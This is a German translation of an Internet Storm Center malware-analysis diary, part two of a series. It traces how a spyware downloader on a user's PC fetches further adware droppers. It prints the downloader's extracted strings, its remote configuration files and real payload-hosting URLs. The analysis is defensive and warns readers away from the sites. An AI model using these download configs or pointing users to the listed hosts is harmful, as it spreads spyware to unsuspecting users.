Schädlingen auf der Spur, Teil 2

Ein sorgloser Klick und schon mutierte Otto Normalos PC in einen P.A.L. -- einen "PC Anderer Leute". Tom Liston beschreibt, wie die heimlich installierten Software-Pakete nach und nach das Kommando übernehmen.

In Pocket speichern vorlesen Druckansicht
Lesezeit: 13 Min.
Inhaltsverzeichnis

Dies ist ein Tagebucheintrag des Diensthabenden im Internet Storm Center. heise Security veröffentlicht die deutsche Übersetzung mit freundlicher Genehmigung des ISC und des Autors Tom Liston. Das Original finden Sie hier.

Achtung: Die Links in diesem Artikel lassen sich absichtlich nicht anklicken. BESUCHEN SIE DIESE SEITEN NICHT. SIE SIND GEMEINT. ECHT. Einige Leser berichten, dass ihre Antiviren-Software sogar beim Öffnen dieses Artikels Alarm schlägt. Dieser Fehlalarm bezieht sich auf die abgedruckten Listing-Teile und kann ignoriert werden. Um weitere Fehlalarme zu vermeiden, wurde an einigen Stellen "<>" durch "[]" ersetzt.

Willkommen zum zweiten Teil unserer Reise durch die dunklen Ecken des Internet. Bei allen, die nach dem ersten ungeduldig auf die Fortsetzung gewartet haben, möchte ich mich entschuldigen, dass es so lange gedauert hat, das alles zusammenzustellen. Falls Sie den ersten Teil verpasst haben oder noch mal kurz nachlesen wollen, um was es ging, finden Sie ihn hier:

http://heise.de/-245140

Lassen Sie sich ruhig Zeit ... ich warte.

Fertig? Gut.

Als wir unseren unerschrockenen "Otto Normalo" verließen, hatte er ein neues Windows XP Home installiert und sich auf die Suche nach Spaß und Abenteuer ins Internet begeben. Jemand hatte ihm von Yahoo! Games erzählt, die er mal ausprobieren wollte. Über Google landete er auf der Seite www.yahoogamez.com. Ab da ging es rund.

Über einen IFRAME mit einen CHM-Exploit wurde Ottos nagelneuer Computer in etwas neues verwandelt -- etwas was er sich nie hätte träumen lassen: einen P.A.L. -- einen "PC Anderer Leute"

Wie bitte?

Naja, obwohl der PC noch Otto gehört ("owned" mit "o") und er die Ehre hat, ihn mit Strom und einer Internet-Verbindung zu versorgen, kontrollieren ihn andere ("0wned" mit Null). Und die lassen die schöne Hardware nach IHRER Pfeife tanzen.

Otto will eigentlich nur in aller Ruhe eine Runde "Donut Boy 2" von der yahoogamez-Seite spielen, doch die netten kleinen Freunde, die er sich dort eingefangen hat, haben anderes im Sinn. Am Ende von Teil 1 hatte sich Folgendes auf Ottos PC geändert:

  1. Ottos Startseite wurde geändert. Sie zeigt jetzt auf:
    http://default-homepage-network.com/start.cgi?new-hkcu
  2. Die Standardsuchseite wurde umgebogen:
    http://server224.smartbotpro.net/7search/?new-hkcu
  3. Der Suchassistent wurde abgeschaltet
  4. "TV Media Display" wurde auf dem PC installiert (mehr dazu später).
  5. addictivetechnologies.net hat Ottos System mit einer Datei beglückt, die Antiviren-Software als Win32/TrojanDownloader.Rameh.C identifiziert.

Was führen Ottos neue Freunde wohl weiter im Schilde? Lassen Sie uns den Spuren weiter folgen und als Erstes mal die Datei näher untersuchen, die Otto von Addictive Technologies "bekommen" hat. Das war eine.cab-Datei mit dem Namen "fr03tp.cab,", die zwei Dateien enthielt:

ATPartners.inf - 403 bytes
ATPartners.dll - 96,256 bytes

(Ein kleiner Kommentar: ATPartners.dll enthält eine statisch gelinkte Kopie der MSVC-Runtime-Umgebung. Das ist komplett unnütz. Addictive Technologies: Wenn ihr schon Schädlinge schreibt -- schreibt sie wenigstens EFFIZIENT.)

Wenn wir die Strings in der DLL-Datei untersuchen, stoßen wir auf recht interessante Dinge:

/F1/Cmd4F1_fr03t.txt
www.f1organizer.com
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects

und auch auf einige ziemlich seltsame:

Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!

(Kann mich da jemand aufklären?)

Stellen wir die ersten Teile dieser Liste richtig zusammen, ergibt sich die URL

http://www.f1organizer.com/F1/Cmd4F1_fr03t.txt

unter der wir eine interessante Datei finden:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/
visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/
visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm

(Geht es nur mir so oder finden auch andere den Ausdruck "softsell" in den RegNow-URLs mehr als amüsant?)

Sieh an! Da wurde noch mehr auf Ottos Rechner "aktualisiert". Ok, untersuchen wir das mal genauer: Die fügen einige Links in Ottos Internet-Favoriten ein, um Online-Game-Shops zu fördern, auf denen AT Provisionen kassiert (Gamehouse Games, Big Fish Games and FlyorDie Games). Auf Ottos Desktop haben sie einen Link zu "007arcadegames," angelegt und sie laden auch gleich noch ein paar Geschenke für Otto herunter: ezbdlLs.dll und SplWbr.dll.

SplWbr.dll hat ein Kampfgewicht von stolzen 454.656 Bytes. Es ist das, was man in der Antivirus-Branche als "File Dropper" bezeichnet: Wenn man ihn ausführt, installiert er eine oder mehrere Dateien, die als Daten angehängt sind. In diesem Fall spuckt er zwei Dateien aus.

Datei #1 -- 135.088 Bytes, die behaupten, sie wären ein "Ad Destroyer and Virtual Bouncer Installation" (Bouncer: Türsteher, Rausschmeißer). Das Ganze ist digital signiert von Spyware Labs, Inc. (www.spywarelabs.com).

Datei #2 -- 302.544 Bytes, die still und leise "TopRebates.com AutoTrack software" installieren. (www.toprebates.com).

ezbdlLs.dll ist eine 151.040-Byte-große, UPX-komprimierte DLL, die sich ausgepackt auf 176.128 Bytes aufbläht. Auch diese Datei ist ein File Dropper mit drei neuen Gaben für Ottos PC:

Datei #1 -- 65.536 Bytes ASPack-komprimierter Güte von www.abetterinternet.com, die sich als ein "Werkzeug für das Herunterladen von Dateien und das Aktualisieren von Software" präsentieren.

Datei #2 -- 33.280 Bytes UPX-gepackter Freude, die sich in 65.536 Byte Schrott-Software der netten Leute von ezULA (www.ezula.com) verwandeln. Die behaupten, sie möchten "Ihr Surfen im Internet einfach, aufregend und persönlich gestalten". Ähhh -- nein danke, lieber nicht.

Datei #3 -- 65.024 Bytes mit einem NullSoft-Installer, der Ottos System mit SAHAgent beglückt. Das ist ein Winsock2 Layered Service Provider (LSP), der sich in Ottos WinSock-Stack einklinkt -- ähnlich wie eine Personal Firewall. SAHAgent leitet ausgewählten Web-Verkehr so um, dass die Provisionen für Ottos zukünftige Online-Anschaffungen an eine bestimmte Partner-ID fließen.

Und was ist jetzt das Ergebnis dieses ganzen Durcheinanders? Otto hat jetzt fünf neue Software-Pakete installiert, die seinen Browser, seine Suchanfragen und seine Online-Geschäfte so umleiten, dass sie den (zweifellos ;-) aufrechten, netten Leuten by ATPartners in den Kram passen. Das Surfen im Internet wird zukünftig "einfach, aufregend und persönlich" (ezula), er weiß: "die besten Downloads sind kostenlos" (abetterinternet), sein Rechner zeigt ihm "klevere Tricks, Geld einzustecken" (TopRebates) und er braucht sich keine Sorgen über Adware/Spyware mehr zu machen, weil die ja der Virtual Bouncer ... äh ... draußen hält (Spyware Labs). Ach ja, noch was: Seine Online-Einkäufe bringen Geld -- irgendjemanden jedenfalls (SAHAgent). Otto sollte sich wirklich glücklich schätzen.

Aber haben Sie DIESEN Teil in der Textdatei mit den Anweisungen bemerkt, die sich ATPartners.dll nachgeladen hat?

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

Das nächste Mal werden also andere Anweisungen nachgeladen:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=
http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=
http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=
http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=
http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm

Allein vom Ansehen dieser Liste wird mir schlecht. (Auch wenn ich über den Begriff "ezStD" lachen musste. Für diejenigen, die kein Englisch sprechen: STD ist eine Abkürzung für "Sexually Transmitted Disease" -- Geschlechtskrankheiten :-) Natürlich könnte ich diesen Misthaufen auch noch auseinander klamüsern -- aber jetzt werden wir uns erst mal einen anderen Bereich ansehen, den Otto nicht mehr kontrolliert: seine Startseite.